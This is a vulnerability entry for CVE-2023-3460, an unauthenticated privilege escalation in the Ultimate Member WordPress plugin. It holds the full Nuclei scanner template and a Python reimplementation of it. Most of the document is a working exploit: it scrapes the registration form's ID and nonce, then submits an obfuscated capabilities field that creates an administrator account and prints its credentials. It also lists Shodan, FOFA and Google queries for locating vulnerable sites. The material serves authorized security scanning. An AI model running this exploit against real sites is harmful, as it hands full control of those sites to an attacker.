nuclei / ProjectDiscovery / NUCLEI:CVE-2023-3460
Published: 2023-07-16 09:50:13

Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation

Source: ProjectDiscovery (github.com)
Tags: cve, cve2023, wordpress, wp-plugin, auth-bypass, wpscan, ultimatemember

CVSS3: 9.8 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 9.4 High (Confidence: High)

EPSS: 0.076 Low (Percentile: 94.2%)

The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.

Note on the template below: it is tagged intrusive. A successful run has registered a new account on the target, submitted with the administrator capability set, and the final extractor prints that account's username and password; remove the account after an authorized test.

Nuclei template:
id: CVE-2023-3460

info:
  name: Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation
  author: DhiyaneshDk
  severity: critical
  description: |
    The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.
  impact: |
    Unauthenticated users can gain unauthorized access and perform actions with elevated privileges.
  remediation: |
    Upgrade to Ultimate Member version 2.6.7 or later.
  reference:
    - https://github.com/gbrsh/CVE-2023-3460
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3460
    - https://wpscan.com/vulnerability/694235c7-4469-4ffd-a722-9225b19e98d7
    - https://blog.wpscan.com/hacking-campaign-actively-exploiting-ultimate-member-plugin/
    - https://wordpress.org/plugins/ultimate-member/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3460
    cwe-id: CWE-269
    epss-score: 0.06326
    epss-percentile: 0.93621
    cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: ultimatemember
    product: ultimate_member
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/ultimate-member
    fofa-query: body=/wp-content/plugins/ultimate-member
    publicwww-query: /wp-content/plugins/ultimate-member
    google-query: inurl:/wp-content/plugins/ultimate-member
  tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember
variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /index.php/register/?{{version}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1

    matchers:
      - type: dsl
        dsl:
          - contains(to_lower(body_1), "ultimate member")
          - regex("wordpress_logged_in_[a-z0-9]{32}", header_4)
          - status_code_4 == 302
        condition: and

    extractors:
      - type: regex
        name: path
        part: location_2
        group: 1
        regex:
          - '([a-z:/.]+)'
        internal: true

      - type: regex
        name: version
        part: body_1
        group: 1
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
        internal: true

      - type: regex
        name: formid
        part: body_3
        group: 1
        regex:
          - 'name="form_id" id="form_id_([0-9]+)"'
        internal: true

      - type: regex
        name: wpnonce
        part: body_3
        group: 1
        regex:
          - 'name="_wpnonce" value="([0-9a-z]+)"'
        internal: true

      - type: dsl
        dsl:
          - '"WP_USERNAME: "+ username'
          - '"WP_PASSWORD: "+ password'
# digest: 490a004630440220173eeac6cfcdda83cedba6a13700d48f6167c4a69304204c41c53291982fec3602204eb02aaf7b7b0995b3b8092e842f23bbb69e20c6b44bb3a7335caf50d296446b:922c64590222798bb761d5b6d8e72950
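As an added example (not part of the ProjectDiscovery template and not Ultimate Member code), the template's four steps reproduced as plain Python functions that run offline: the readme.txt fingerprint with an explicit below-2.6.7 gate (the template extracts the Stable tag but only uses it as a query string on the register URL, never in the matcher), the form_id and _wpnonce extractors with the template's own regexes, the registration body with the extra capabilities key encoded exactly as the template sends it, and the 302-plus-login-cookie success condition. The README and REGISTER_HTML strings are constructed, not captured from a real site, and the function names are assumptions of this example.

```python
import re
from urllib.parse import urlencode

# Added example, not ProjectDiscovery's template or Ultimate Member code:
# the template's fingerprint / extract / build / match steps as plain
# functions, so each piece can be checked offline against constructed input.

FIXED_VERSION = (2, 6, 7)  # first Ultimate Member release that is not affected

# The same regexes the template's extractors and matcher use.
STABLE_TAG_RE = re.compile(r"(?i)Stable.tag:\s?([\w.]+)")
FORM_ID_RE = re.compile(r'name="form_id" id="form_id_([0-9]+)"')
NONCE_RE = re.compile(r'name="_wpnonce" value="([0-9a-z]+)"')
LOGIN_COOKIE_RE = re.compile(r"wordpress_logged_in_[a-z0-9]{32}")

# Constructed sample inputs (not captured from a real site).
README = "=== Ultimate Member ===\nRequires at least: 5.5\nStable tag: 2.6.6\n"
REGISTER_HTML = (
    '<form method="post" action="">'
    '<input type="hidden" name="form_id" id="form_id_1234" value="1234" />'
    '<input type="hidden" id="_wpnonce" name="_wpnonce" value="0a1b2c3d4e" />'
    "</form>"
)


def parse_version(readme_text):
    """Numeric tuple from 'Stable tag: X.Y.Z', or None (e.g. 'Stable tag: trunk')."""
    m = STABLE_TAG_RE.search(readme_text)
    if not m:
        return None
    parts = []
    for piece in m.group(1).split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts) or None


def is_affected(readme_text):
    """True only for a parseable Stable tag below 2.6.7.

    An unparseable tag returns False; treat that as 'verify by hand', not 'safe'.
    """
    version = parse_version(readme_text)
    return version is not None and version < FIXED_VERSION


def extract_form(register_html):
    """(form_id, nonce) from the registration page, or None if either is missing."""
    fid = FORM_ID_RE.search(register_html)
    nonce = NONCE_RE.search(register_html)
    if not (fid and nonce):
        return None
    return fid.group(1), nonce.group(1)


def build_payload(form_id, nonce, username, password, email, first, last):
    """Form body the template POSTs to the registration endpoint.

    The last key is spelled with U+00E0 ('wp_c\u00e0pabilities'); urlencode emits it
    as wp_c%C3%A0pabilities%5Badministrator%5D, byte-for-byte what the template sends.
    """
    fields = [
        (f"user_login-{form_id}", username),
        (f"user_email-{form_id}", email),
        (f"user_password-{form_id}", password),
        (f"confirm_user_password-{form_id}", password),
        (f"first_name-{form_id}", first),
        (f"last_name-{form_id}", last),
        ("form_id", form_id),
        ("um_request", ""),
        ("_wpnonce", nonce),
        ("wp_c\u00e0pabilities[administrator]", "1"),
    ]
    return urlencode(fields)


def matches(status_code, set_cookie_headers):
    """The template's success condition: a 302 that also sets a
    wordpress_logged_in_* cookie, i.e. the site logged the new account in."""
    return status_code == 302 and any(
        LOGIN_COOKIE_RE.search(h) for h in set_cookie_headers
    )


if __name__ == "__main__":
    print("affected:", is_affected(README))  # True for 2.6.6
    form_id, nonce = extract_form(REGISTER_HTML)
    print(build_payload(form_id, nonce, "scanuser", "Scan-Pass-1", "scan@example.com", "S", "U"))
    print("exploited:", matches(302, ["wordpress_logged_in_" + "a" * 32 + "=x; path=/"]))
```

Only is_affected and the extractors are read-only; build_payload produces the body of a request that creates an account on the target, so send it only in an authorized test and delete the resulting user afterwards. A Stable tag of "trunk" (common in WordPress readmes) yields None and is deliberately not reported as affected, so such hosts need a manual version check.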
